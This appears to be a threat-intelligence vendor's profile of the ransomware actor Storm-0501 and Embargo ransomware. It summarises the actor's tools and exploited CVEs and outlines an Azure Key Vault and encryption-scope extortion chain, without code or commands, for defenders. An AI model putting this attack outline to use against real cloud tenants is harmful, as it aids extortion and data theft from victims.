Storm-0501
Storm-0501 is a financially motivated ransomware actor active since 2021. Microsoft and related reporting associate it with the Embargo ransomware operation, and the content states Embargo is also tracked as Storm-0501 by Microsoft. The actor has previously deployed Sabbath, Hive, BlackCat, Hunters International, and LockBit 3.0. Reporting in the provided content describes Storm-0501 operating in on-premises and hybrid multi-tenant Azure environments and abusing both Windows and cloud resources during intrusions. Observed activity includes use of compromised accounts to access Microsoft Entra Connect, use of a victim Global Administrator account without MFA to access cloud environments, and use of Storage Account Access Keys. In Azure-focused operations, Microsoft reported Storm-0501 used AzureHound to enumerate Entra ID tenants and abused Azure encryption scopes in Azure Storage to extort victims. The described cloud attack chain involved creating a new Azure Key Vault, creating a key, creating an encryption scope, encrypting victim data, deleting the key or vault, and demanding ransom. On endpoints and internal networks, Storm-0501 has used native Windows tools and commands such as tasklist.exe and systeminfo, as well as open-source tools including OSQuery and ossec-win32, for discovery. Additional reconnaissance and post-compromise tooling cited in the content includes ADRecon.ps1, nltest, net group, sc query, and AzureHound. Credential access and privilege escalation activity described in the content includes Impacket SecretsDump, DCSync, KeePass credential theft, and brute-force attacks. For lateral movement, command and control, and persistence, the content cites Cobalt Strike, Evil-WinRM, AnyDesk, NinjaOne, and Level.io. For ransomware deployment and persistence, Storm-0501 used a scheduled task named "SysUpdate" registered via Group Policy Object to distribute Embargo ransomware. The Embargo profile in the content also describes a Rust-based toolchain including the Embargo payload, the MDeployer loader, and the MS4Killer EDR killer. MS4Killer is described as using a BYOVD technique with probmon.sys to terminate security products. For exfiltration, Storm-0501 has exfiltrated stolen data to the MEGA file-sharing site and used Rclone to move data to cloud storage such as MegaSync. The content also states the actor exfiltrated data to its own infrastructure using the AzCopy CLI. The Embargo profile further describes double extortion, with data exfiltration followed by file encryption. The content also links Storm-0501 to Fox Tempest as a customer or affiliate that used malware signed through Fox Tempest's abused Microsoft Artifact Signing service. Known aliasing in the provided content is limited to the normalized form Storm-0501 / storm_0501.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Tradecraft
58 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.
Associated malware families
20 malware families attributed to this actor across reporting.
15 additional families tracked in Mallory.
Associated vulnerabilities
13 CVEs this actor has used in observed campaigns. 13 of them exploited in the wild.
Initial Access Primary (Storm-0501): Exploitation of known N-day vulnerabilities in internet-facing applications: CVE-2022-47966 (Zoho ManageEngine RCE)
Initial Access Primary (Storm-0501): Exploitation of known N-day vulnerabilities in internet-facing applications: CVE-2023-29300 / CVE-2023-38203 (Adobe ColdFusion)
Initial Access Primary (Storm-0501): Exploitation of known N-day vulnerabilities in internet-facing applications: CVE-2023-29300 / CVE-2023-38203 (Adobe ColdFusion)
Initial Access Primary (Storm-0501): Exploitation of known N-day vulnerabilities in internet-facing applications: CVE-2023-4966 (Citrix NetScaler - "Citrix Bleed")
This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly focusing on executions initiated by LNK files. This behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, where specially crafted LNK files are used to trigger malicious code execution through cmd.exe or powershell.exe. This technique has been actively exploited by multiple APT groups in targeted attacks through both HTTP and SMB delivery methods.
8 more CVEs tied to this actor tracked in Mallory.
Observables
3 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Abused Azure encryption scopes and Key Vault keys post-compromise to render victim storage data inaccessible and demand ransom.
Listed as an associated threat actor in the detection annotation for exploitation of the public-facing PTC Windchill vulnerability CVE-2026-4681.
Named by Microsoft as a threat group that utilized malware signed through Fox Tempest's fraudulent signing service.
Named as a customer of Fox Tempest's malware-signing service.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.